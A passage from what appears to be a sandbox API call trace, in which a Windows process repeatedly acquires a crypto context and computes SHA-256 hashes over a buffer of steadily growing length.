phHash=0x1ee3f8) returned 1 [0262.324] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xb40, dwFlags=0x0) returned 1 [0262.324] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.324] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2dea10, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2dea10, pdwDataLen=0x1ee448) returned 1 [0262.324] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.324] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.324] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.325] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.325] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xb60, dwFlags=0x0) returned 1 [0262.325] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.325] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2dea40, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2dea40, pdwDataLen=0x1ee448) returned 1 [0262.325] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.325] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.325] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.326] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.326] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xb80, dwFlags=0x0) returned 1 [0262.326] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.326] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2dea70, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2dea70, pdwDataLen=0x1ee448) returned 1 [0262.326] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.326] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.326] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.327] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.327] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xba0, dwFlags=0x0) returned 1 [0262.327] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.327] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2deaa0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2deaa0, pdwDataLen=0x1ee448) returned 1 [0262.327] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.327] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.327] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.327] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.328] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xbc0, dwFlags=0x0) returned 1 [0262.328] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.328] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2de350, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2de350, pdwDataLen=0x1ee448) returned 1 [0262.328] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.328] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.328] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.328] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.328] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xbe0, dwFlags=0x0) returned 1 [0262.328] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.328] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31b200, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31b200, pdwDataLen=0x1ee448) returned 1 [0262.328] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.329] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.329] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.329] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.329] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xc00, dwFlags=0x0) returned 1 [0262.329] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.329] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31b260, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31b260, pdwDataLen=0x1ee448) returned 1 [0262.329] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.329] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.329] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.330] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.330] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xc20, dwFlags=0x0) returned 1 [0262.330] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.330] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31b290, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31b290, pdwDataLen=0x1ee448) returned 1 [0262.330] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.330] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.330] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.331] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.331] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xc40, dwFlags=0x0) returned 1 [0262.331] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.331] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31b2c0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31b2c0, pdwDataLen=0x1ee448) returned 1 [0262.331] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.331] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.331] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.332] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.332] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xc60, dwFlags=0x0) returned 1 [0262.332] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.332] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31b2f0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31b2f0, pdwDataLen=0x1ee448) returned 1 [0262.332] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.332] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.332] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.333] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.333] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xc80, dwFlags=0x0) returned 1 [0262.333] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.333] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31b320, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31b320, pdwDataLen=0x1ee448) returned 1 [0262.333] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.333] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.333] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.333] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.334] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xca0, dwFlags=0x0) returned 1 [0262.334] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.334] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31b350, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31b350, pdwDataLen=0x1ee448) returned 1 [0262.334] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.334] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.334] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.334] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.334] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xcc0, dwFlags=0x0) returned 1 [0262.334] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.334] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31b380, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31b380, pdwDataLen=0x1ee448) returned 1 [0262.334] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.334] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.335] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.335] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.335] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xce0, dwFlags=0x0) returned 1 [0262.335] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.335] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31b3b0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31b3b0, pdwDataLen=0x1ee448) returned 1 [0262.335] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.335] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.335] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.336] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.336] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xd00, dwFlags=0x0) returned 1 [0262.336] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.336] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31b3e0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31b3e0, pdwDataLen=0x1ee448) returned 1 [0262.336] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.336] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.336] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.337] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.337] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xd20, dwFlags=0x0) returned 1 [0262.337] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.337] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31b410, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31b410, pdwDataLen=0x1ee448) returned 1 [0262.337] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.337] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.337] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.338] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.338] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xd40, dwFlags=0x0) returned 1 [0262.338] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.338] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31b440, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31b440, pdwDataLen=0x1ee448) returned 1 [0262.338] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.338] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.338] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.338] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.339] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xd60, dwFlags=0x0) returned 1 [0262.339] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.339] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31b470, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31b470, pdwDataLen=0x1ee448) returned 1 [0262.339] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.339] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.339] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.339] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.339] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xd80, dwFlags=0x0) returned 1 [0262.339] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.340] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31b4a0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31b4a0, pdwDataLen=0x1ee448) returned 1 [0262.340] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.340] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.340] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.340] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.340] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xda0, dwFlags=0x0) returned 1 [0262.340] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.340] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31b4d0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31b4d0, pdwDataLen=0x1ee448) returned 1 [0262.340] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.340] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.340] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.341] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.341] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xdc0, dwFlags=0x0) returned 1 [0262.341] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.341] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31b500, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31b500, pdwDataLen=0x1ee448) returned 1 [0262.341] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.341] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.341] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.342] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.342] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xde0, dwFlags=0x0) returned 1 [0262.342] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.342] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31b530, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31b530, pdwDataLen=0x1ee448) returned 1 [0262.342] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.342] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.342] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.343] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.343] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xe00, dwFlags=0x0) returned 1 [0262.343] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.343] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31b560, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31b560, pdwDataLen=0x1ee448) returned 1 [0262.343] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.343] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.343] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.344] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.344] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xe20, dwFlags=0x0) returned 1 [0262.344] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.344] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31b590, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31b590, pdwDataLen=0x1ee448) returned 1 [0262.344] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.344] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.344] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.345] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.345] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xe40, dwFlags=0x0) returned 1 [0262.345] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.345] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31b5c0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31b5c0, pdwDataLen=0x1ee448) returned 1 [0262.345] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.345] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.345] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.345] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.346] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xe60, dwFlags=0x0) returned 1 [0262.346] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.346] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31b5f0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31b5f0, pdwDataLen=0x1ee448) returned 1 [0262.346] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.346] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.346] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.346] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.347] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xe80, dwFlags=0x0) returned 1 [0262.347] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.347] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31b620, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31b620, pdwDataLen=0x1ee448) returned 1 [0262.347] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.347] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.347] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.347] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.347] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xea0, dwFlags=0x0) returned 1 [0262.348] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 